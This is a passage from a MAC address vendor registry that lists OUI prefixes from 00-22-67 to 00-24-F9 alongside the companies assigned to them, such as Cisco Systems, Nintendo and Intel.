(hex) Nortel Networks 00-22-68 (hex) Hon Hai Precision Ind. Co., Ltd. 00-22-69 (hex) Hon Hai Precision Ind. Co., Ltd. 00-22-6A (hex) Honeywell 00-22-6B (hex) Cisco-Linksys, LLC 00-22-6C (hex) LinkSprite Technologies, Inc. 00-22-6D (hex) Shenzhen GIEC Electronics Co., Ltd. 00-22-6E (hex) Gowell Electronic Limited 00-22-6F (hex) 3onedata Technology Co. Ltd. 00-22-70 (hex) ABK North America, LLC 00-22-71 (hex) Jäger Computergesteuerte Messtechnik GmbH 00-22-72 (hex) American Micro-Fuel Device Corp. 00-22-73 (hex) Techway 00-22-74 (hex) FamilyPhone AB 00-22-75 (hex) Belkin International, Inc. 00-22-76 (hex) Triple EYE B.V. 00-22-77 (hex) NEC Australia Pty Ltd 00-22-78 (hex) Shenzhen Tongfang Multimedia Technology Co.,Ltd. 00-22-79 (hex) Nippon Conlux Co., Ltd. 00-22-7A (hex) Telecom Design 00-22-7B (hex) Apogee Labs, Inc. 00-22-7C (hex) Woori SMT Co.,ltd 00-22-7D (hex) YE DATA INC. 00-22-7E (hex) Chengdu 30Kaitian Communication Industry Co.Ltd 00-22-7F (hex) Ruckus Wireless 00-22-80 (hex) A2B Electronics AB 00-22-81 (hex) Daintree Networks Inc 00-22-82 (hex) 8086 Limited 00-22-83 (hex) Juniper Networks 00-22-84 (hex) DESAY A&V SCIENCE AND TECHNOLOGY CO.,LTD 00-22-85 (hex) NOMUS COMM SYSTEMS 00-22-86 (hex) ASTRON 00-22-87 (hex) Titan Wireless LLC 00-22-88 (hex) Sagrad, Inc. 00-22-89 (hex) Optosecurity Inc. 00-22-8A (hex) Teratronik elektronische systeme gmbh 00-22-8B (hex) Kensington Computer Products Group 00-22-8C (hex) Photon Europe GmbH 00-22-8D (hex) GBS Laboratories LLC 00-22-8E (hex) TV-NUMERIC 00-22-8F (hex) CNRS 00-22-90 (hex) Cisco Systems 00-22-91 (hex) Cisco Systems 00-22-92 (hex) Cinetal 00-22-93 (hex) ZTE Corporation 00-22-94 (hex) Kyocera Corporation 00-22-95 (hex) SGM Technology for lighting spa 00-22-96 (hex) LinoWave Corporation 00-22-97 (hex) XMOS Semiconductor 00-22-98 (hex) Sony Ericsson Mobile Communications 00-22-99 (hex) SeaMicro Inc. 00-22-9A (hex) Lastar, Inc. 00-22-9B (hex) AverLogic Technologies, Inc. 00-22-9C (hex) Verismo Networks Inc 00-22-9D (hex) PYUNG-HWA IND.CO.,LTD 00-22-9E (hex) Social Aid Research Co., Ltd. 00-22-9F (hex) Sensys Traffic AB 00-22-A0 (hex) Delphi Corporation 00-22-A1 (hex) Huawei Symantec Technologies Co.,Ltd. 00-22-A2 (hex) Xtramus Technologies 00-22-A3 (hex) California Eastern Laboratories 00-22-A4 (hex) 2Wire 00-22-A5 (hex) Texas Instruments 00-22-A6 (hex) Sony Computer Entertainment America 00-22-A7 (hex) Tyco Electronics AMP GmbH 00-22-A8 (hex) Ouman Finland Oy 00-22-A9 (hex) LG Electronics Inc 00-22-AA (hex) Nintendo Co., Ltd. 00-22-AB (hex) Shenzhen Turbosight Technology Ltd 00-22-AC (hex) Hangzhou Siyuan Tech. Co., Ltd 00-22-AD (hex) TELESIS TECHNOLOGIES, INC. 00-22-AE (hex) Mattel Inc. 00-22-AF (hex) Safety Vision 00-22-B0 (hex) D-Link Corporation 00-22-B1 (hex) Elbit Systems 00-22-B2 (hex) 4RF Communications Ltd 00-22-B3 (hex) Sei S.p.A. 00-22-B4 (hex) Motorola Mobility, Inc. 00-22-B5 (hex) NOVITA 00-22-B6 (hex) Superflow Technologies Group 00-22-B7 (hex) GSS Grundig SAT-Systems GmbH 00-22-B8 (hex) Norcott 00-22-B9 (hex) Analogix Seminconductor, Inc 00-22-BA (hex) HUTH Elektronik Systeme GmbH 00-22-BB (hex) beyerdynamic GmbH & Co. KG 00-22-BC (hex) JDSU France SAS 00-22-BD (hex) Cisco Systems 00-22-BE (hex) Cisco Systems 00-22-BF (hex) SieAmp Group of Companies 00-22-C0 (hex) Shenzhen Forcelink Electronic Co, Ltd 00-22-C1 (hex) Active Storage Inc. 00-22-C2 (hex) Proview Eletronica do Brasil LTDA 00-22-C3 (hex) Zeeport Technology Inc. 00-22-C4 (hex) epro GmbH 00-22-C5 (hex) INFORSON Co,Ltd. 00-22-C6 (hex) Sutus Inc 00-22-C7 (hex) SEGGER Microcontroller GmbH & Co. KG 00-22-C8 (hex) Applied Instruments 00-22-C9 (hex) Lenord, Bauer & Co GmbH 00-22-CA (hex) Anviz Biometric Tech. Co., Ltd. 00-22-CB (hex) IONODES Inc. 00-22-CC (hex) SciLog, Inc. 00-22-CD (hex) Ared Technology Co., Ltd. 00-22-CE (hex) Cisco, Service Provider Video Technology Group 00-22-CF (hex) PLANEX Communications INC 00-22-D0 (hex) Polar Electro Oy 00-22-D1 (hex) Albrecht Jung GmbH & Co. KG 00-22-D2 (hex) All Earth Comércio de Eletrônicos LTDA. 00-22-D3 (hex) Hub-Tech 00-22-D4 (hex) ComWorth Co., Ltd. 00-22-D5 (hex) Eaton Corp. Electrical Group Data Center Solutions - Pulizzi 00-22-D6 (hex) Cypak AB 00-22-D7 (hex) Nintendo Co., Ltd. 00-22-D8 (hex) Shenzhen GST Security and Safety Technology Limited 00-22-D9 (hex) Fortex Industrial Ltd. 00-22-DA (hex) ANATEK, LLC 00-22-DB (hex) Translogic Corporation 00-22-DC (hex) Vigil Health Solutions Inc. 00-22-DD (hex) Protecta Electronics Ltd 00-22-DE (hex) OPPO Digital, Inc. 00-22-DF (hex) TAMUZ Monitors 00-22-E0 (hex) Atlantic Software Technologies S.r.L. 00-22-E1 (hex) ZORT Labs, LLC. 00-22-E2 (hex) WABTEC Transit Division 00-22-E3 (hex) Amerigon 00-22-E4 (hex) APASS TECHNOLOGY CO., LTD. 00-22-E5 (hex) Fisher-Rosemount Systems Inc. 00-22-E6 (hex) Intelligent Data 00-22-E7 (hex) WPS Parking Systems 00-22-E8 (hex) Applition Co., Ltd. 00-22-E9 (hex) ProVision Communications 00-22-EA (hex) Rustelcom Inc. 00-22-EB (hex) Data Respons A/S 00-22-EC (hex) IDEALBT TECHNOLOGY CORPORATION 00-22-ED (hex) TSI Power Corporation 00-22-EE (hex) Algo Communication Products Ltd 00-22-EF (hex) Ibis Tek, LLC 00-22-F0 (hex) 3 Greens Aviation Limited 00-22-F1 (hex) PRIVATE 00-22-F2 (hex) SunPower Corp 00-22-F3 (hex) SHARP CORPORATION 00-22-F4 (hex) AMPAK Technology, Inc. 00-22-F5 (hex) Advanced Realtime Tracking GmbH 00-22-F6 (hex) Syracuse Research Corporation 00-22-F7 (hex) Conceptronic 00-22-F8 (hex) PIMA Electronic Systems Ltd. 00-22-F9 (hex) Pollin Electronic GmbH 00-22-FA (hex) Intel Corporate 00-22-FB (hex) Intel Corporate 00-22-FC (hex) Nokia Danmark A/S 00-22-FD (hex) Nokia Danmark A/S 00-22-FE (hex) Microprocessor Designs Inc 00-22-FF (hex) NIVIS LLC 00-23-00 (hex) Cayee Computer Ltd. 00-23-01 (hex) Witron Technology Limited 00-23-02 (hex) Cobalt Digital, Inc. 00-23-03 (hex) LITE-ON IT Corporation 00-23-04 (hex) Cisco Systems 00-23-05 (hex) Cisco Systems 00-23-06 (hex) ALPS Electric Co., Ltd 00-23-07 (hex) FUTURE INNOVATION TECH CO.,LTD 00-23-08 (hex) Arcadyan Technology Corporation 00-23-09 (hex) Janam Technologies LLC 00-23-0A (hex) ARBURG GmbH & Co KG 00-23-0B (hex) Motorola Mobility, Inc. 00-23-0C (hex) CLOVER ELECTRONICS CO.,LTD. 00-23-0D (hex) Nortel Networks 00-23-0E (hex) Gorba AG 00-23-0F (hex) Hirsch Electronics Corporation 00-23-10 (hex) LNC Technology Co., Ltd. 00-23-11 (hex) Gloscom Co., Ltd. 00-23-12 (hex) Apple, Inc 00-23-13 (hex) Qool Technologies Ltd. 00-23-14 (hex) Intel Corporate 00-23-15 (hex) Intel Corporate 00-23-16 (hex) KISAN ELECTRONICS CO 00-23-17 (hex) Lasercraft Inc 00-23-18 (hex) Toshiba 00-23-19 (hex) Sielox LLC 00-23-1A (hex) ITF Co., Ltd. 00-23-1B (hex) Danaher Motion - Kollmorgen 00-23-1C (hex) Fourier Systems Ltd. 00-23-1D (hex) Deltacom Electronics Ltd 00-23-1E (hex) Cezzer Multimedia Technologies 00-23-1F (hex) Guangda Electronic & Telecommunication Technology Development Co., Ltd. 00-23-20 (hex) Nicira Networks 00-23-21 (hex) Avitech International Corp 00-23-22 (hex) KISS Teknical Solutions, Inc. 00-23-23 (hex) Zylin AS 00-23-24 (hex) G-PRO COMPUTER 00-23-25 (hex) IOLAN Holding 00-23-26 (hex) Fujitsu Limited 00-23-27 (hex) Shouyo Electronics CO., LTD 00-23-28 (hex) ALCON TELECOMMUNICATIONS CO., LTD. 00-23-29 (hex) DDRdrive LLC 00-23-2A (hex) eonas IT-Beratung und -Entwicklung GmbH 00-23-2B (hex) IRD A/S 00-23-2C (hex) Senticare 00-23-2D (hex) SandForce 00-23-2E (hex) Kedah Electronics Engineering, LLC 00-23-2F (hex) Advanced Card Systems Ltd. 00-23-30 (hex) DIZIPIA, INC. 00-23-31 (hex) Nintendo Co., Ltd. 00-23-32 (hex) Apple, Inc 00-23-33 (hex) Cisco Systems 00-23-34 (hex) Cisco Systems 00-23-35 (hex) Linkflex Co.,Ltd 00-23-36 (hex) METEL s.r.o. 00-23-37 (hex) Global Star Solutions ULC 00-23-38 (hex) OJ-Electronics A/S 00-23-39 (hex) Samsung Electronics 00-23-3A (hex) Samsung Electronics Co.,Ltd 00-23-3B (hex) C-Matic Systems Ltd 00-23-3C (hex) Alflex 00-23-3D (hex) Novero holding B.V. 00-23-3E (hex) Alcatel-Lucent-IPD 00-23-3F (hex) Purechoice Inc 00-23-40 (hex) MiX Telematics 00-23-41 (hex) Siemens AG 00-23-42 (hex) Coffee Equipment Company 00-23-43 (hex) TEM AG 00-23-44 (hex) Objective Interface Systems 00-23-45 (hex) Sony Ericsson Mobile Communications 00-23-46 (hex) Vestac 00-23-47 (hex) ProCurve Networking by HP 00-23-48 (hex) SAGEM COMMUNICATION 00-23-49 (hex) Helmholtz Centre Berlin for Material and Energy 00-23-4A (hex) PRIVATE 00-23-4B (hex) Inyuan Technology Inc. 00-23-4C (hex) KTC AB 00-23-4D (hex) Hon Hai Precision Ind. Co., Ltd. 00-23-4E (hex) Hon Hai Precision Ind. Co., Ltd. 00-23-4F (hex) Luminous Power Technologies Pvt. Ltd. 00-23-50 (hex) LynTec 00-23-51 (hex) 2Wire 00-23-52 (hex) DATASENSOR S.p.A. 00-23-53 (hex) F E T Elettronica snc 00-23-54 (hex) ASUSTek COMPUTER INC. 00-23-55 (hex) Kinco Automation(Shanghai) Ltd. 00-23-56 (hex) Packet Forensics LLC 00-23-57 (hex) Pitronot Technologies and Engineering P.T.E. Ltd. 00-23-58 (hex) SYSTEL SA 00-23-59 (hex) Benchmark Electronics ( Thailand ) Public Company Limited 00-23-5A (hex) COMPAL INFORMATION (KUNSHAN) CO., Ltd. 00-23-5B (hex) Gulfstream 00-23-5C (hex) Aprius, Inc. 00-23-5D (hex) Cisco Systems 00-23-5E (hex) Cisco Systems 00-23-5F (hex) Silicon Micro Sensors GmbH 00-23-60 (hex) Lookit Technology Co., Ltd 00-23-61 (hex) Unigen Corporation 00-23-62 (hex) Goldline Controls 00-23-63 (hex) Zhuhai RaySharp Technology Co., Ltd. 00-23-64 (hex) Power Instruments Pte Ltd 00-23-65 (hex) ELKA-Elektronik GmbH 00-23-66 (hex) Beijing Siasun Electronic System Co.,Ltd. 00-23-67 (hex) UniControls a.s. 00-23-68 (hex) Motorola 00-23-69 (hex) Cisco-Linksys, LLC 00-23-6A (hex) ClearAccess, Inc. 00-23-6B (hex) Xembedded, Inc. 00-23-6C (hex) Apple, Inc 00-23-6D (hex) ResMed Ltd 00-23-6E (hex) Burster GmbH & Co KG 00-23-6F (hex) DAQ System 00-23-70 (hex) Snell 00-23-71 (hex) SOAM Systel 00-23-72 (hex) MORE STAR INDUSTRIAL GROUP LIMITED 00-23-73 (hex) GridIron Systems, Inc. 00-23-74 (hex) Motorola Mobility, Inc. 00-23-75 (hex) Motorola Mobility, Inc. 00-23-76 (hex) HTC Corporation 00-23-77 (hex) Isotek Electronics Ltd 00-23-78 (hex) GN Netcom A/S 00-23-79 (hex) Union Business Machines Co. Ltd. 00-23-7A (hex) RIM 00-23-7B (hex) WHDI LLC 00-23-7C (hex) NEOTION 00-23-7D (hex) Hewlett-Packard Company 00-23-7E (hex) ELSTER GMBH 00-23-7F (hex) PLANTRONICS 00-23-80 (hex) Nanoteq 00-23-81 (hex) Lengda Technology(Xiamen) Co.,Ltd. 00-23-82 (hex) Lih Rong Electronic Enterprise Co., Ltd. 00-23-83 (hex) InMage Systems Inc 00-23-84 (hex) GGH Engineering s.r.l. 00-23-85 (hex) ANTIPODE 00-23-86 (hex) Tour & Andersson AB 00-23-87 (hex) ThinkFlood, Inc. 00-23-88 (hex) V.T. Telematica S.p.a. 00-23-89 (hex) HANGZHOU H3C Technologies Co., Ltd. 00-23-8A (hex) Ciena Corporation 00-23-8B (hex) Quanta Computer Inc. 00-23-8C (hex) PRIVATE 00-23-8D (hex) Techno Design Co., Ltd. 00-23-8E (hex) PIRELLI BROADBAND SOLUTIONS 00-23-8F (hex) NIDEC COPAL CORPORATION 00-23-90 (hex) Algolware Corporation 00-23-91 (hex) Maxian 00-23-92 (hex) Proteus Industries Inc. 00-23-93 (hex) AJINEXTEK 00-23-94 (hex) Samjeon 00-23-95 (hex) Motorola Mobility, Inc. 00-23-96 (hex) ANDES TECHNOLOGY CORPORATION 00-23-97 (hex) Westell Technologies Inc. 00-23-98 (hex) Sky Control 00-23-99 (hex) VD Division, Samsung Electronics Co. 00-23-9A (hex) EasyData Software GmbH 00-23-9B (hex) Elster Solutions, LLC 00-23-9C (hex) Juniper Networks 00-23-9D (hex) Mapower Electronics Co., Ltd 00-23-9E (hex) Jiangsu Lemote Technology Corporation Limited 00-23-9F (hex) Institut für Prüftechnik 00-23-A0 (hex) Hana CNS Co., LTD. 00-23-A1 (hex) Trend Electronics Ltd 00-23-A2 (hex) Motorola Mobility, Inc. 00-23-A3 (hex) Motorola Mobility, Inc. 00-23-A4 (hex) New Concepts Development Corp. 00-23-A5 (hex) SageTV, LLC 00-23-A6 (hex) E-Mon 00-23-A7 (hex) Redpine Signals, Inc. 00-23-A8 (hex) Marshall Electronics 00-23-A9 (hex) Beijing Detianquan Electromechanical Equipment Co., Ltd 00-23-AA (hex) HFR, Inc. 00-23-AB (hex) Cisco Systems 00-23-AC (hex) Cisco Systems 00-23-AD (hex) Xmark Corporation 00-23-AE (hex) Dell Inc. 00-23-AF (hex) Motorola Mobility, Inc. 00-23-B0 (hex) COMXION Technology Inc. 00-23-B1 (hex) Longcheer Technology (Singapore) Pte Ltd 00-23-B2 (hex) Intelligent Mechatronic Systems Inc 00-23-B3 (hex) Lyyn AB 00-23-B4 (hex) Nokia Danmark A/S 00-23-B5 (hex) ORTANA LTD 00-23-B6 (hex) SECURITE COMMUNICATIONS / HONEYWELL 00-23-B7 (hex) Q-Light Co., Ltd. 00-23-B8 (hex) Sichuan Jiuzhou Electronic Technology Co.,Ltd 00-23-B9 (hex) EADS Deutschland GmbH 00-23-BA (hex) Chroma 00-23-BB (hex) Schmitt Industries 00-23-BC (hex) EQ-SYS GmbH 00-23-BD (hex) Digital Ally, Inc. 00-23-BE (hex) Cisco SPVTG 00-23-BF (hex) Mainpine, Inc. 00-23-C0 (hex) Broadway Networks 00-23-C1 (hex) Securitas Direct AB 00-23-C2 (hex) SAMSUNG Electronics. Co. LTD 00-23-C3 (hex) LogMeIn, Inc. 00-23-C4 (hex) Lux Lumen 00-23-C5 (hex) Radiation Safety and Control Services Inc 00-23-C6 (hex) SMC Corporation 00-23-C7 (hex) AVSystem 00-23-C8 (hex) TEAM-R 00-23-C9 (hex) Sichuan Tianyi Information Science & Technology Stock CO.,LTD 00-23-CA (hex) Behind The Set, LLC 00-23-CB (hex) Shenzhen Full-join Technology Co.,Ltd 00-23-CC (hex) Nintendo Co., Ltd. 00-23-CD (hex) TP-LINK TECHNOLOGIES CO., LTD. 00-23-CE (hex) KITA DENSHI CORPORATION 00-23-CF (hex) CUMMINS-ALLISON CORP. 00-23-D0 (hex) Uniloc USA Inc. 00-23-D1 (hex) TRG 00-23-D2 (hex) Inhand Electronics, Inc. 00-23-D3 (hex) AirLink WiFi Networking Corp. 00-23-D4 (hex) Texas Instruments 00-23-D5 (hex) WAREMA electronic GmbH 00-23-D6 (hex) Samsung Electronics Co.,LTD 00-23-D7 (hex) Samsung Electronics 00-23-D8 (hex) Ball-It Oy 00-23-D9 (hex) Banner Engineering 00-23-DA (hex) Industrial Computer Source (Deutschland)GmbH 00-23-DB (hex) saxnet gmbh 00-23-DC (hex) Benein, Inc 00-23-DD (hex) ELGIN S.A. 00-23-DE (hex) Ansync Inc. 00-23-DF (hex) Apple, Inc 00-23-E0 (hex) INO Therapeutics LLC 00-23-E1 (hex) Cavena Image Products AB 00-23-E2 (hex) SEA Signalisation 00-23-E3 (hex) Microtronic AG 00-23-E4 (hex) IPnect co. ltd. 00-23-E5 (hex) IPaXiom Networks 00-23-E6 (hex) Pirkus, Inc. 00-23-E7 (hex) Hinke A/S 00-23-E8 (hex) Demco Corp. 00-23-E9 (hex) F5 Networks, Inc. 00-23-EA (hex) Cisco Systems 00-23-EB (hex) Cisco Systems 00-23-EC (hex) Algorithmix GmbH 00-23-ED (hex) Motorola CHS 00-23-EE (hex) Motorola Mobility, Inc. 00-23-EF (hex) Zuend Systemtechnik AG 00-23-F0 (hex) Shanghai Jinghan Weighing Apparatus Co. Ltd. 00-23-F1 (hex) Sony Ericsson Mobile Communications 00-23-F2 (hex) TVLogic 00-23-F3 (hex) Glocom, Inc. 00-23-F4 (hex) Masternaut 00-23-F5 (hex) WILO SE 00-23-F6 (hex) Softwell Technology Co., Ltd. 00-23-F7 (hex) PRIVATE 00-23-F8 (hex) ZyXEL Communications Corporation 00-23-F9 (hex) Double-Take Software, INC. 00-23-FA (hex) RG Nets, Inc. 00-23-FB (hex) IP Datatel, Inc. 00-23-FC (hex) Ultra Stereo Labs, Inc 00-23-FD (hex) AFT Atlas Fahrzeugtechnik GmbH 00-23-FE (hex) Biodevices, SA 00-23-FF (hex) Beijing HTTC Technology Ltd. 00-24-00 (hex) Nortel Networks 00-24-01 (hex) D-Link Corporation 00-24-02 (hex) Op-Tection GmbH 00-24-03 (hex) Nokia Danmark A/S 00-24-04 (hex) Nokia Danmark A/S 00-24-05 (hex) Dilog Nordic AB 00-24-06 (hex) Pointmobile 00-24-07 (hex) TELEM SAS 00-24-08 (hex) Pacific Biosciences 00-24-09 (hex) The Toro Company 00-24-0A (hex) US Beverage Net 00-24-0B (hex) Virtual Computer Inc. 00-24-0C (hex) DELEC GmbH 00-24-0D (hex) OnePath Networks LTD. 00-24-0E (hex) Inventec Besta Co., Ltd. 00-24-0F (hex) Ishii Tool & Engineering Corporation 00-24-10 (hex) NUETEQ Technology,Inc. 00-24-11 (hex) PharmaSmart LLC 00-24-12 (hex) Benign Technologies Co, Ltd. 00-24-13 (hex) Cisco Systems 00-24-14 (hex) Cisco Systems 00-24-15 (hex) Magnetic Autocontrol GmbH 00-24-16 (hex) Any Use 00-24-17 (hex) Thomson Telecom Belgium 00-24-18 (hex) Nextwave Semiconductor 00-24-19 (hex) PRIVATE 00-24-1A (hex) Red Beetle Inc. 00-24-1B (hex) iWOW Communications Pte Ltd 00-24-1C (hex) FuGang Electronic (DG) Co.,Ltd 00-24-1D (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 00-24-1E (hex) Nintendo Co., Ltd. 00-24-1F (hex) DCT-Delta GmbH 00-24-20 (hex) NetUP Inc. 00-24-21 (hex) MICRO-STAR INT'L CO., LTD. 00-24-22 (hex) Knapp Logistik Automation GmbH 00-24-23 (hex) AzureWave Technologies (Shanghai) Inc. 00-24-24 (hex) Axis Network Technology 00-24-25 (hex) Shenzhenshi chuangzhicheng Technology Co.,Ltd 00-24-26 (hex) NOHMI BOSAI LTD. 00-24-27 (hex) SSI COMPUTER CORP 00-24-28 (hex) EnergyICT 00-24-29 (hex) MK MASTER INC. 00-24-2A (hex) Hittite Microwave Corporation 00-24-2B (hex) Hon Hai Precision Ind.Co.,Ltd. 00-24-2C (hex) Hon Hai Precision Ind. Co., Ltd. 00-24-2E (hex) Datastrip Inc. 00-24-2F (hex) VirtenSys Inc 00-24-30 (hex) Ruby Tech Corp. 00-24-31 (hex) Uni-v co.,ltd 00-24-32 (hex) Neostar Technology Co.,LTD 00-24-33 (hex) Alps Electric Co., Ltd 00-24-34 (hex) Lectrosonics, Inc. 00-24-35 (hex) WIDE CORPORATION 00-24-36 (hex) Apple, Inc 00-24-37 (hex) Motorola - BSG 00-24-38 (hex) Brocade Communications Systems, Inc 00-24-39 (hex) Essential Viewing Systems Limited 00-24-3A (hex) Ludl Electronic Products 00-24-3B (hex) CSSI (S) Pte Ltd 00-24-3C (hex) S.A.A.A. 00-24-3D (hex) Emerson Appliance Motors and Controls 00-24-3F (hex) Storwize, Inc. 00-24-40 (hex) Halo Monitoring, Inc. 00-24-41 (hex) Wanzl Metallwarenfabrik GmbH 00-24-42 (hex) Axona Limited 00-24-43 (hex) Nortel Networks 00-24-44 (hex) Nintendo Co., Ltd. 00-24-45 (hex) LiquidxStream Systems Inc. 00-24-46 (hex) MMB Research Inc. 00-24-47 (hex) Kaztek Systems 00-24-48 (hex) SpiderCloud Wireless, Inc 00-24-49 (hex) Shen Zhen Lite Star Electronics Technology Co., Ltd 00-24-4A (hex) Voyant International 00-24-4B (hex) PERCEPTRON INC 00-24-4C (hex) Solartron Metrology Ltd 00-24-4D (hex) Hokkaido Electronics Corporation 00-24-4E (hex) RadChips, Inc. 00-24-4F (hex) Asantron Technologies Ltd. 00-24-50 (hex) Cisco Systems 00-24-51 (hex) Cisco Systems 00-24-52 (hex) Silicon Software GmbH 00-24-53 (hex) Initra d.o.o. 00-24-54 (hex) Samsung Electronics Co., LTD 00-24-55 (hex) MuLogic BV 00-24-56 (hex) 2Wire 00-24-58 (hex) PA Bastion CC Rostov-on-Don 344011 00-24-59 (hex) ABB STOTZ-KONTAKT GmbH 00-24-5A (hex) Nanjing Panda Electronics Company Limited 00-24-5B (hex) RAIDON TECHNOLOGY, INC. 00-24-5C (hex) Design-Com Technologies Pty. Ltd. 00-24-5D (hex) Terberg besturingstechniek B.V. 00-24-5E (hex) Hivision Co.,ltd 00-24-5F (hex) Vine Telecom CO.,Ltd. 00-24-60 (hex) Giaval Science Development Co. Ltd. 00-24-61 (hex) Shin Wang Tech. 00-24-62 (hex) Rayzone Corporation 00-24-63 (hex) Phybridge Inc 00-24-64 (hex) Bridge Technologies Co AS 00-24-65 (hex) Elentec 00-24-66 (hex) Unitron nv 00-24-67 (hex) AOC International (Europe) GmbH 00-24-68 (hex) Sumavision Technologies Co.,Ltd 00-24-69 (hex) Smart Doorphones 00-24-6A (hex) Solid Year Co., Ltd. 00-24-6B (hex) Covia, Inc. 00-24-6C (hex) ARUBA NETWORKS, INC. 00-24-6D (hex) Weinzierl Engineering GmbH 00-24-6E (hex) Phihong USA Corp. 00-24-6F (hex) Onda Communication spa 00-24-70 (hex) AUROTECH ultrasound AS. 00-24-71 (hex) Fusion MultiSystems dba Fusion-io 00-24-72 (hex) ReDriven Power Inc. 00-24-73 (hex) 3Com Europe Ltd 00-24-74 (hex) Autronica Fire And Securirty 00-24-75 (hex) Compass System(Embedded Dept.) 00-24-76 (hex) TAP.tv 00-24-77 (hex) Tibbo Technology 00-24-78 (hex) Mag Tech Electronics Co Limited 00-24-79 (hex) Optec Displays, Inc. 00-24-7A (hex) FU YI CHENG Technology Co., Ltd. 00-24-7B (hex) Actiontec Electronics, Inc 00-24-7C (hex) Nokia Danmark A/S 00-24-7D (hex) Nokia Danmark A/S 00-24-7E (hex) Universal Global Scientific Industrial Co., Ltd 00-24-7F (hex) Nortel Networks 00-24-80 (hex) Meteocontrol GmbH 00-24-81 (hex) Hewlett-Packard Company 00-24-82 (hex) Ruckus Wireless 00-24-83 (hex) LG Electronics 00-24-84 (hex) Bang and Olufsen Medicom a/s 00-24-85 (hex) ConteXtream Ltd 00-24-86 (hex) DesignArt Networks 00-24-87 (hex) Blackboard Inc. 00-24-88 (hex) Centre For Development Of Telematics 00-24-89 (hex) Vodafone Omnitel N.V. 00-24-8A (hex) Kaga Electronics Co., Ltd. 00-24-8B (hex) HYBUS CO., LTD. 00-24-8C (hex) ASUSTek COMPUTER INC. 00-24-8D (hex) Sony Computer Entertainment Inc. 00-24-8E (hex) Infoware ZRt. 00-24-8F (hex) DO-MONIX 00-24-90 (hex) Samsung Electronics Co.,LTD 00-24-91 (hex) Samsung Electronics 00-24-92 (hex) Motorola, Broadband Solutions Group 00-24-93 (hex) Motorola, Inc 00-24-94 (hex) Shenzhen Baoxin Tech CO., Ltd. 00-24-95 (hex) Motorola Mobility, Inc. 00-24-96 (hex) Ginzinger electronic systems 00-24-97 (hex) Cisco Systems 00-24-98 (hex) Cisco Systems 00-24-99 (hex) Aquila Technologies 00-24-9A (hex) Beijing Zhongchuang Telecommunication Test Co., Ltd. 00-24-9B (hex) Action Star Enterprise Co., Ltd. 00-24-9C (hex) Bimeng Comunication System Co. Ltd 00-24-9D (hex) NES Technology Inc. 00-24-9E (hex) ADC-Elektronik GmbH 00-24-9F (hex) RIM Testing Services 00-24-A0 (hex) Motorola Mobility, Inc. 00-24-A1 (hex) Motorola Mobility, Inc. 00-24-A2 (hex) Hong Kong Middleware Technology Limited 00-24-A3 (hex) Sonim Technologies Inc 00-24-A4 (hex) Siklu Communication 00-24-A5 (hex) Buffalo Inc. 00-24-A6 (hex) TELESTAR DIGITAL GmbH 00-24-A7 (hex) Advanced Video Communications Inc. 00-24-A8 (hex) ProCurve Networking by HP 00-24-A9 (hex) Ag Leader Technology 00-24-AA (hex) Dycor Technologies Ltd. 00-24-AB (hex) A7 Engineering, Inc. 00-24-AC (hex) Hangzhou DPtech Technologies Co., Ltd. 00-24-AD (hex) Adolf Thies Gmbh & Co. KG 00-24-AE (hex) Morpho 00-24-AF (hex) EchoStar Technologies 00-24-B0 (hex) ESAB AB 00-24-B1 (hex) Coulomb Technologies 00-24-B2 (hex) Netgear 00-24-B3 (hex) Graf-Syteco GmbH & Co. KG 00-24-B4 (hex) ESCATRONIC GmbH 00-24-B5 (hex) Nortel Networks 00-24-B6 (hex) Seagate Technology 00-24-B7 (hex) GridPoint, Inc. 00-24-B8 (hex) free alliance sdn bhd 00-24-B9 (hex) Wuhan Higheasy Electronic Technology Development Co.Ltd 00-24-BA (hex) Texas Instruments 00-24-BB (hex) CENTRAL Corporation 00-24-BC (hex) HuRob Co.,Ltd 00-24-BD (hex) Hainzl Industriesysteme GmbH 00-24-BE (hex) Sony Corporation 00-24-BF (hex) CIAT 00-24-C0 (hex) NTI COMODO INC 00-24-C1 (hex) Motorola Mobility, Inc. 00-24-C2 (hex) Asumo Co.,Ltd. 00-24-C3 (hex) Cisco Systems 00-24-C4 (hex) Cisco Systems 00-24-C5 (hex) Meridian Audio Limited 00-24-C6 (hex) Hager Electro SAS 00-24-C7 (hex) Mobilarm Ltd 00-24-C8 (hex) Broadband Solutions Group 00-24-C9 (hex) Broadband Solutions Group 00-24-CA (hex) Tobii Technology AB 00-24-CB (hex) Autonet Mobile 00-24-CC (hex) Fascinations Toys and Gifts, Inc. 00-24-CD (hex) Willow Garage, Inc. 00-24-CE (hex) Exeltech Inc 00-24-CF (hex) Inscape Data Corporation 00-24-D0 (hex) Shenzhen SOGOOD Industry CO.,LTD. 00-24-D1 (hex) Thomson Inc. 00-24-D2 (hex) Askey Computer 00-24-D3 (hex) QUALICA Inc. 00-24-D4 (hex) FREEBOX SA 00-24-D5 (hex) Winward Industrial Limited 00-24-D6 (hex) Intel Corporate 00-24-D7 (hex) Intel Corporate 00-24-D8 (hex) IlSung Precision 00-24-D9 (hex) BICOM, Inc. 00-24-DA (hex) Innovar Systems Limited 00-24-DB (hex) Alcohol Monitoring Systems 00-24-DC (hex) Juniper Networks 00-24-DD (hex) Centrak, Inc. 00-24-DE (hex) GLOBAL Technology Inc. 00-24-DF (hex) Digitalbox Europe GmbH 00-24-E0 (hex) DS Tech, LLC 00-24-E1 (hex) Convey Computer Corp. 00-24-E2 (hex) HASEGAWA ELECTRIC CO.,LTD. 00-24-E3 (hex) CAO Group 00-24-E4 (hex) Withings 00-24-E5 (hex) Seer Technology, Inc 00-24-E6 (hex) In Motion Technology Inc. 00-24-E7 (hex) Plaster Networks 00-24-E8 (hex) Dell Inc. 00-24-E9 (hex) Samsung Electronics Co., Ltd., Storage System Division 00-24-EA (hex) iris-GmbH infrared & intelligent sensors 00-24-EB (hex) ClearPath Networks, Inc. 00-24-EC (hex) United Information Technology Co.,Ltd. 00-24-ED (hex) YT Elec. Co,.Ltd. 00-24-EE (hex) Wynmax Inc. 00-24-EF (hex) Sony Ericsson Mobile Communications 00-24-F0 (hex) Seanodes 00-24-F1 (hex) Shenzhen Fanhai Sanjiang Electronics Co., Ltd. 00-24-F2 (hex) Uniphone Telecommunication Co., Ltd. 00-24-F3 (hex) Nintendo Co., Ltd. 00-24-F4 (hex) Kaminario Technologies Ltd. 00-24-F5 (hex) NDS Surgical Imaging 00-24-F6 (hex) MIYOSHI ELECTRONICS CORPORATION 00-24-F7 (hex) Cisco Systems 00-24-F8 (hex) Technical Solutions Company Ltd. 00-24-F9 (hex) Cisco Systems 